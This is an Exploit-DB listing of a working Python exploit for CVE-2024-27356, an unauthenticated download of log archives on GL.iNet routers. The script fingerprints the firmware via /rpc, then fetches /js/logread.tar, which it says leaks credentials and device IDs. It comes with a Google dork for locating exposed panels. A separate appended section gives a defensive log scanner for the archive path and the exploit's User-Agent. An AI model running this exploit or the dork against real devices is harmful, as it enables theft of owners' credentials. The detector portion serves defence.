[remote] GL-iNet MT6000 4.5.5 - Arbitrary File Download
source link: https://www.exploit-db.com/exploits/51942
# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
# CVE: CVE-2024-27356
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: 2/26/2024
# Exploit Author: Bandar Alharbi (aggressor)
# Vendor Homepage: www.gl-inet.com
# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
# Tested Model: GL-X3000 Spitz AX
# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
import sys
import requests
import json

requests.packages.urllib3.disable_warnings()
h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}

def DoesTarExist():
    r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
    if r.status_code == 200:
        f = open("logread.tar", "wb")
        f.write(r.content)
        f.close()
        print("[*] Full logs archive `logread.tar` has been downloaded!")
        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
        return True
    else:
        print("[*] The `logread.tar` archive does not exist however ... try again later!")
        return False

def isVulnerable():
    r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
    if r1.status_code == 500 and "nginx" in r1.text:
        r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
        if "Admin-Token" in r2.text:
            j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
            r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
            ver = r3.json()['result']['firmware_version']
            model = r3.json()['result']['model']
            if ver.startswith(('4.')):
                print("[*] Firmware version (%s) is vulnerable!" %ver)
                print("[*] Device model is: %s" %model)
                return True
    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
    return False

def isAlive():
    try:
        r = requests.get(url, verify=False, timeout=30, headers=h)
        if r.status_code != 200:
            print("[*] Make sure the target's web interface is accessible!")
            return False
        elif r.status_code == 200:
            print("[*] The target is reachable!")
            return True
    except Exception:
        print("[*] Error occurred when connecting to the target!")
        pass
    return False

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("exploit.py url")
        sys.exit(0)
    url = sys.argv[1]
    url = url.lower()
    if not url.startswith(('http://', 'https://')):
        print("[*] Invalid url format! It should be http[s]://<domain or ip>")
        sys.exit(0)
    if url.endswith("/"):
        url = url.rstrip("/")
    print("[*] GL.iNet Unauthenticated Full Logs Downloader")
    try:
        if (isAlive() and isVulnerable()) == (True and True):
            DoesTarExist()
    except KeyboardInterrupt:
        print("[*] The exploit has been stopped by the user!")
        sys.exit(0)
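
A defender-side counterpart, added here and not part of the original exploit listing: it scans web access logs for requests to the `/js/logread.tar` path and for the hard-coded User-Agent that the script above sends. The combined access-log format is an assumption about how the device or an upstream proxy logs requests, and the sample lines are constructed.

```python
import re

# Indicators taken from the script above: the archive path and its User-Agent.
ARCHIVE_PATH = "/js/logread.tar"
POC_USER_AGENT = "contxbot/1.0"

# Assumption: log lines use the common "combined" access-log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

def find_logread_requests(lines):
    """Return one finding per request for the archive or from the PoC User-Agent."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed format
        path = m.group("path").split("?", 1)[0]
        hit_path = path == ARCHIVE_PATH
        hit_ua = POC_USER_AGENT in (m.group("ua") or "")
        if not (hit_path or hit_ua):
            continue
        status = int(m.group("status"))
        findings.append({
            "ip": m.group("ip"), "time": m.group("ts"),
            "path": path, "status": status,
            # A 200 on the archive path means the log archive was actually served.
            "archive_served": hit_path and status == 200,
            "poc_user_agent": hit_ua,
        })
    return findings

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Feb/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (compatible;contxbot/1.0)"',
    '192.0.2.10 - - [26/Feb/2024:10:00:02 +0000] "POST /rpc HTTP/1.1" 500 177 "-" "Mozilla/5.0 (compatible;contxbot/1.0)"',
    '192.0.2.10 - - [26/Feb/2024:10:00:03 +0000] "GET /js/logread.tar HTTP/1.1" 200 481280 "-" "Mozilla/5.0 (compatible;contxbot/1.0)"',
    '198.51.100.7 - - [26/Feb/2024:11:30:00 +0000] "GET /js/logread.tar HTTP/1.1" 404 153 "-" "curl/8.5.0"',
    '203.0.113.5 - - [26/Feb/2024:12:00:00 +0000] "GET /js/app.js HTTP/1.1" 200 90211 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for finding in find_logread_requests(SAMPLE_LOG):
        print(finding)
```

A finding with `archive_served` set means the log contents should be treated as disclosed; the User-Agent match alone is weak evidence because the header is trivially changed.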